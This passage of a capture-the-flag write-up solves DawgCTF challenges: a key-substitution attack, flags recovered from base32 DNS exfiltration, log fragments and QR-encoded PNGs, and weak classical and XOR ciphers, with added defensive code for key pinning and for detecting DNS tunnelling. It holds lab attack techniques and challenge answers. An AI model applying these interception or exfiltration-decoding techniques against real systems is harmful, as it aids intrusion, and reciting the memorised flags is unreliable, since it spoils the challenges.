json_data = json.dumps(data)
r = requests.post(url, data=json_data, headers=headers)
print(r.text)
```
The output is as follows.
{"content":"t:Hello|n:bob|t:this is|n:alice|t:send the flag encrypted under this asymetric key|k:30818902818100c601a069ac5c51cfb2914d32ac8f7e794dc31fb7943b448a54dc80e8b41bfde4bb2c46758269f76890e8e5ba8ef4ba5c8d8556f3e03c3dcf8c12603cb17abb5625a8a2043b7bd83730e034581597df8707513115da965a55b207e47dfc26b867e53f1b9aafbfc3c0c11f7560a853084097e0cce434798c2ff16bc515dfb5ed0f0203010001"}
{"content":"t:public|k:30818902818100f6c5e18fe43125a5412b644abddf031a8b41e1f904491434dd325392bf355e8f955575dfe299f5b5e769f2ca0aa1969a0736f816e5c908c522c563df5bb56f003edd85bed9b57f791cc6ea2aa835f5bf7207365ffd9b88301fec649b9bd17c21d4d07968f6654b4039b8e4bdf1bd2f364b3f4ebeb585b5fbffdb0632fff81bdf0203010001|t:private|k:[private key value not preserved on this page]"}
{"content":"t:here it is|d:c544162284a48a08b1e2ec68d1d3a1c3d9ca8a876183995189b406c1d08ada99bc57eb4fda29ada55fa7499df1a65b51908375b12f4b576cc642eb1858d2492a899ed3b60215ded43121f790bf5198c9d7f6f92353541d62b74136f890a189c120c410bf8a9486b2cea5462388d9dbd55ccceb160920dcfc39e95c239c92a9f4b91865928b383060f704be5549bc9ea481949af50c5d86d624116807728a08490eec92bdbdacc382f0bd850f36"}
{"content":"t:DawgCTF{C3RT1F13D_1NS3CUR3}"}
DawgCTF{C3RT1F13D_1NS3CUR3}
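The substitution works because Bob encrypts under whatever key arrives in the `k:` field. The following is an added example, not part of the original writeup or the challenge code, of a receiver that only accepts a key whose fingerprint was pinned for the claimed sender; the function names, the pinning table and the sample keys are assumptions made for illustration.

```python
import hashlib
import hmac

def parse_fields(content):
    """Split 'tag:value|tag:value' into ordered (tag, value) pairs."""
    fields = []
    for part in content.split('|'):
        tag, sep, value = part.partition(':')
        if not sep:
            raise ValueError(f'malformed field: {part!r}')
        fields.append((tag, value))
    return fields

def key_fingerprint(key_hex):
    """SHA-256 hex digest of the raw key bytes."""
    return hashlib.sha256(bytes.fromhex(key_hex)).hexdigest()

def accept_key(content, pinned):
    """Return the key to encrypt under, or None when the message is malformed
    or its key does not match the fingerprint pinned for the claimed sender."""
    try:
        fields = parse_fields(content)
        names = [v for t, v in fields if t == 'n']
        keys = [v for t, v in fields if t == 'k']
        if len(names) != 2 or len(keys) != 1:
            return None
        sender = names[1]  # "n:bob|t:this is|n:alice": second name is the sender
        actual = key_fingerprint(keys[0])
    except ValueError:
        return None
    expected = pinned.get(sender)
    if expected is None or not hmac.compare_digest(actual, expected):
        return None
    return keys[0]

# Constructed sample values (not the keys from the challenge).
ALICE_KEY = 'aa' * 32
OTHER_KEY = 'bb' * 32
PINNED = {'alice': key_fingerprint(ALICE_KEY)}  # assumed to be distributed out of band
REQUEST = 't:Hello|n:bob|t:this is|n:alice|t:send the flag encrypted under this asymetric key|k:'

def demo():
    genuine = accept_key(REQUEST + ALICE_KEY, PINNED)
    substituted = accept_key(REQUEST + OTHER_KEY, PINNED)
    return genuine, substituted

if __name__ == '__main__':
    print(demo())
```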
I Love Bacon (Fwn 200)
The pcap contains only DNS traffic, and in those DNS queries the part of the hostname left after removing the domain looks like a base32 string. Concatenate the ones that decode to printable text.
```python
#!/usr/bin/env python3
from scapy.all import *
from base64 import b32decode

def is_printable(s):
    for c in s:
        if c < 32 or c > 126:
            return False
    return True

packets = rdpcap('dns_c2.pcap')

flag = ''
for p in packets:
    # Only look at queries sent to the DNS server
    if p[IP].dst == '10.1.1.53':
        qname = p[DNSQR].qname.decode()
        b32 = qname.split('.')[0]
        try:
            dec = b32decode(b32)
            if is_printable(dec):
                flag += dec.decode()
        except Exception:
            # Not valid base32: skip this query
            continue

print(flag)
```
DawgCTF{s1zzlin_succul3nt_c2_b4con}
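The same property used to extract the flag can serve as a detection rule on DNS query logs. The following is an added example, not part of the original writeup: it flags query names whose leftmost label decodes from base32 to printable ASCII. The query names are constructed, `example.test` is a placeholder zone, and the minimum label length is an assumed threshold.

```python
import base64
import binascii

def decode_b32_label(label):
    """Return decoded bytes if the label is valid base32, else None."""
    candidate = label.upper()
    candidate += '=' * (-len(candidate) % 8)  # DNS labels cannot carry '=' padding
    try:
        return base64.b32decode(candidate)
    except (binascii.Error, ValueError):
        return None

def is_printable(data):
    return len(data) > 0 and all(32 <= b <= 126 for b in data)

def flag_queries(qnames, min_label_len=8):
    """Return (qname, decoded_text) for each query whose leftmost label
    decodes from base32 to printable ASCII."""
    hits = []
    for qname in qnames:
        label = qname.rstrip('.').split('.')[0]
        if len(label) < min_label_len:
            continue
        decoded = decode_b32_label(label)
        if decoded is not None and is_printable(decoded):
            hits.append((qname, decoded.decode('ascii')))
    return hits

# Constructed query names; example.test is a placeholder zone.
SAMPLE_QNAMES = [
    'www.example.test.',
    'NBSWY3DP.example.test.',        # base32 of "hello"
    'mail-gateway01.example.test.',  # '-', '0', '1' are outside the base32 alphabet
    'download.example.test.',        # base32 alphabet only, but decodes to non-printable bytes
    'mzxw6ytboi.example.test.',      # "foobar", lower-cased and padding stripped
]

if __name__ == '__main__':
    for qname, text in flag_queries(SAMPLE_QNAMES):
        print(f'{qname} -> {text!r}')
```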
Modem Metamorphosi (Fwn 250)
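The task is to analyze a pcap file and answer with the router's manufacturer, model, old firmware version, new firmware name, and new firmware version.
Filter on http. The POST to /upgrade.cgi shows that the firmware name is the following.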
openwrt-24.10.0-bcm47xx-generic-linksys_wrt610n-v1-squashfs.bin
Searching for it turns up the following page.
https://openwrt.org/toh/hwdata/linksys/linksys_wrt610n_v1
From this page we learn the following.
・Manufacturer: Linksys
・Model: WRT610N
・NewFirmwareName: OpenWrt
・NewFirmwareVersion: 24.10.0
In addition, the response to the GET for / shows that the current version is the following.
1.00.00 B18
DawgCTF{Linksys_WRT610N_1.00.00 B18_OpenWrt_24.10.0}
The Step After the PCAP (Fwn 350)
A network log is attached. Looking at the log, 45.76.123.45 is the only destination address for which Payload Fragment has a value. Arrange the Payload Fragment values of these records in chronological order.
```python
#!/usr/bin/env python3
with open('network_forensics.log', 'r') as f:
    lines = f.read().splitlines()[9:6665]

# Each record occupies 13 lines in the log
LINE_SIZE = 13

logs = []
for i in range(0, len(lines), LINE_SIZE):
    logs.append(lines[i:i + LINE_SIZE - 1])

# Collect the non-empty payload fragments, keyed by timestamp
fragments = {}
for log in logs:
    if log[10] != 'Payload Fragment: -':
        recordno = int(log[0].split('#')[1].split()[0])
        timestamp = log[1].split(': ')[1]
        dstip = log[3].split(': ')[1]
        fragment = log[10].split(': ')[1]
        assert dstip == '45.76.123.45'
        fragments[timestamp] = fragment

# Sort by timestamp and join the fragments with underscores
fragments = sorted(fragments.items())

flag = 'Dawg{'
for k, v in fragments:
    flag += v
    flag += '_'
flag = flag[:-1]
flag += '}'
print(flag)
```
Dawg{HBRPO_IG8F1_CBFNO_6B9M8_0O2RA_K1VRJ_NVGFY_GWWQC_38HYF_9SXME_COSFO_GYR3X_KXWNR_EK8PK_3YR9O_UDOCU_ZRENU_N5Z3J_QIP98_Q1ZXO_I65FD_HJK1E_YY37Q_9AH8R_VHS1K_3AQ6L_6GT6M_JXK87_AU5BH_XTPDP_FF5E8_II49K_Q71N8_MTZX2_72HPO_EVB9O_OAEDO_ECVE6_PR5N8_I4P40_MGG1W1}
Stomach Bug (Fwn 400)
The download from the given URL never finishes. Dump for about a minute to capture the data partway.
```
$ curl http://stomachbug.umbccd.net > dump.txt
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 339k 0 339k 0 0 5619 0 --:--:-- 0:01:01 --:--:-- 5746^C
$ head -n 330 dump.txt
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefg
|000|89504e470d0a1a0a0000000d494844520000027100000271080000000008e6bbe40
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefgh
|001|00014fa4944415478daeddac192db38804441ffff4fcf1ef7b266d703e48d682a71
"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghi
|002|ea194b14092414512afcf9cf30fe3fc71f53601067106718c419c41906710671067
        :
abcdefghijklmnopqrstuvwxyz{|}~ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHI
|160|0ce20ce20c83388338c320ce20ce20ce30883388330ce20ce20c833883388338c32
bcdefghijklmnopqrstuvwxyz{|}~ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJ
|161|0ce20ce30883388338cbf8fff01ece54b872a58eb450000000049454e44ae426082
cdefghijklmnopqrstuvwxyz{|}~ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJK
|000|89504e470d0a1a0a0000000d494844520000027100000271080000000008e6bbe40
defghijklmnopqrstuvwxyz{|}~ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKL
|001|00014fa4944415478daeddac192db38804441ffff4fcf1ef7b266d703e48d682a71
efghijklmnopqrstuvwxyz{|}~ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLM
|002|ea194b14092414512afcf9cf30fe3fc71f53601067106718c419c41906710671067
```
It appears that the same data was being sent over and over. Its content is in PNG format, so reconstruct it.

The reconstructed image shows a QR code, so read it with a code reader. The result appears to be PNG data again, so decode it. When doing so, wherever 0xc2 or 0xc3 is followed by a value of 0x80 or greater, apply the following correction.
c2 xx -> xx
c3 xx -> xx + 0x40
Combined with the QR code reconstruction above, the code written is as follows.
```python
#!/usr/bin/env python3
from PIL import Image
from pyzbar.pyzbar import decode

with open('dump.txt', 'r') as f:
    data = f.read().splitlines()

# Keep only the "|nnn|hex" lines, and only the first full cycle (162 chunks)
data = [data[i] for i in range(1, len(data), 2)]
data = data[:162]

bin_png = ''
for d in data:
    bin_png += d.split('|')[-1]

png = bytes.fromhex(bin_png)
with open('qr.png', 'wb') as f:
    f.write(png)

# Read the first QR code; its payload is a second PNG
img = Image.open('qr.png')
data = decode(img)[0].data

# Undo the c2/c3 two-byte sequences
png = b''
i = 0
while i < len(data):
    if data[i] == 0xc2:
        png += bytes([data[i + 1]])
        i += 2
    elif data[i] == 0xc3:
        png += bytes([data[i + 1] + 0x40])
        i += 2
    else:
        png += bytes([data[i]])
        i += 1

with open('qr2.png', 'wb') as f:
    f.write(png)
```
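The c2/c3 correction rule is exactly what results when each byte from 0x80 to 0xFF is read as a Latin-1 character and then encoded as UTF-8. The following is an added example, not part of the original writeup, that reverses the expansion with strict validation and checks it against the standard codecs; the function names and the constructed test input are assumptions made for illustration.

```python
PNG_SIGNATURE = b'\x89PNG\r\n\x1a\n'

def undo_utf8_expansion(data):
    """Map c2 xx -> xx and c3 xx -> xx + 0x40, rejecting anything else >= 0x80."""
    out = bytearray()
    i = 0
    while i < len(data):
        b = data[i]
        if b < 0x80:                      # ASCII passes through unchanged
            out.append(b)
            i += 1
        elif b in (0xC2, 0xC3):
            if i + 1 >= len(data) or not 0x80 <= data[i + 1] <= 0xBF:
                raise ValueError(f'bad continuation byte at offset {i + 1}')
            out.append(data[i + 1] + (0x40 if b == 0xC3 else 0))
            i += 2
        else:
            raise ValueError(f'unexpected byte {b:#04x} at offset {i}')
    return bytes(out)

def undo_with_codecs(data):
    """Same reversal using the standard codecs."""
    return data.decode('utf-8').encode('latin-1')

def expand(raw):
    """The forward direction: bytes read as Latin-1 text, then UTF-8 encoded."""
    return raw.decode('latin-1').encode('utf-8')

if __name__ == '__main__':
    expanded = expand(PNG_SIGNATURE)      # constructed input
    print(expanded.hex(' '))
    print(undo_utf8_expansion(expanded) == PNG_SIGNATURE)
```

The strict version raises on a truncated or malformed sequence instead of silently producing a corrupt image.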

The reconstructed image again shows a QR code; reading it with a code reader gave the following string.
RGF3Z0NURnsxX0JMNE0zX1RIMFMzX0g0Wk00VF9UUjVDSzNSNX0=
Base64-decode it.
```
$ echo RGF3Z0NURnsxX0JMNE0zX1RIMFMzX0g0Wk00VF9UUjVDSzNSNX0= | base64 -d
DawgCTF{1_BL4M3_TH0S3_H4ZM4T_TR5CK3R5}
```
DawgCTF{1_BL4M3_TH0S3_H4ZM4T_TR5CK3R5}
Artemis Gordon (Cryptography 100)
The ciphertext is this image.

It is the Lunar Alphabet, so decode it at https://www.dcode.fr/lunar-alphabet-leandro-katz.
MOONMAN
DawgCTF{MOONMAN}
I Hate Physics! (Cryptography 150)
Concatenate the first and last characters of each line of the text.
DawgCTF{therm0dyn4mic5sucks!}
Vault Breaker (Cryptography 150)
The attached PDF contained an image like this.

It can be guessed to be the Dada Urka Cipher, so decode it at https://www.dcode.fr/dada-urka-cipher.
EXTREMELYLONGPASSWORD
DawgCTF{EXTREMELYLONGPASSWORD}
Six Seven (Cryptography 200)
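An outline of the encryption process is as follows.
・Check that the first 8 bytes of flag are "DawgCTF{"
・ct = encrypt(flag)
  ・start: a random 1-byte string
  ・key = start
  ・For i from 1 up to (but not including) the length of flag, do the following
    ・key += gen(key[i-1]).to_bytes(1, "big")
  ・XOR key with flag and return the result
・Output ct in hexadecimal
Because the flag starts with "D", the value of start can be worked out. Once start is known, key can be computed and the flag decrypted by XOR.
```python
#!/usr/bin/env python3
from Crypto.Util.strxor import strxor

def gen(start):
    return (((6 * 7) * (start - 6) * 7) + ((start * 6) - 7) * (start ^ 6)) % 255

with open('output.txt', 'r') as f:
    ct = bytes.fromhex(f.read().split(' = ')[1])

# The first key byte is the first ciphertext byte XOR the known plaintext 'D'
start = ord('D') ^ ct[0]

# Every later key byte is derived from the previous one
key = bytes([start])
for i in range(1, len(ct)):
    key += gen(key[i - 1]).to_bytes(1, 'big')

flag = strxor(key, ct).decode()
print(flag)
```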
DawgCTF{please_use_secrets_in_your_stream_ciphers_69bfe194af43f0cd}














